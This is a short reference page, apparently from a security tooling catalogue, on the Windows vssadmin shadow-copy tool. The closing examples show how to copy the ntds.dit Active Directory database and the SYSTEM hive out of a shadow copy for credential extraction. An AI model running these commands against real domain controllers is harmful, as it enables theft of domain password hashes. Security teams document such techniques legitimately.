Security Slice

vssadmin

vssadmin

⚠ Only present on Domain Controllers

Description

The Windows Volume Shadow Service. It can be use to make copies of files that are currently in use (including ntds.dit).

PlatformWindows
AuthorMicrosoft
LicenseWindows
URLvssadmin

Usage

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
---- Commands Supported ----
 
Delete Shadows        - Delete volume shadow copies
List Providers        - List registered volume shadow copy providers
List Shadows          - List existing volume shadow copies
List ShadowStorage    - List volume shadow copy storage associations
List Volumes          - List volumes eligible for shadow copies
List Writers          - List subscribed volume shadow copy writers
Resize ShadowStorage  - Resize a volume shadow copy storage association

Examples

vssadmin list shadows

This will list any existing shadow copies.

C:\WINDOWS\system32>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
 
Contents of shadow copy set ID: {34e68305-975f-4d17-8655-4993d495a4e7}
   Contained 1 shadow copies at creation time: 3/17/2022 5:14:25 PM
      Shadow Copy ID: {670f6106-3968-4656-a8cc-a822f2222719}
         Original Volume: (C:)\\?\Volume{f99d1339-fef8-4d0c-92f0-df3a6876270d}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: DESKTOP-TI18DM9
         Service Machine: DESKTOP-TI18DM9
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessibleWriters
         Attributes: Persistent, Client-accessible, No auto release, Differential, Auto recovered

You can then copy files from the shadow volume, like ntds.dit for example.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit

Then you need to copy the SYSTEM hive to get the encryption key.

reg save hklm\system C:\windows\temp\system /y
vssadmin create shadow /for=c:

This will create a new shadow copy of the C drive. Alternatively, you can run this command in Powershell.

(gwmi -list win32_shadowcopy).Create('C:\','ClientAccessible')

Blog Posts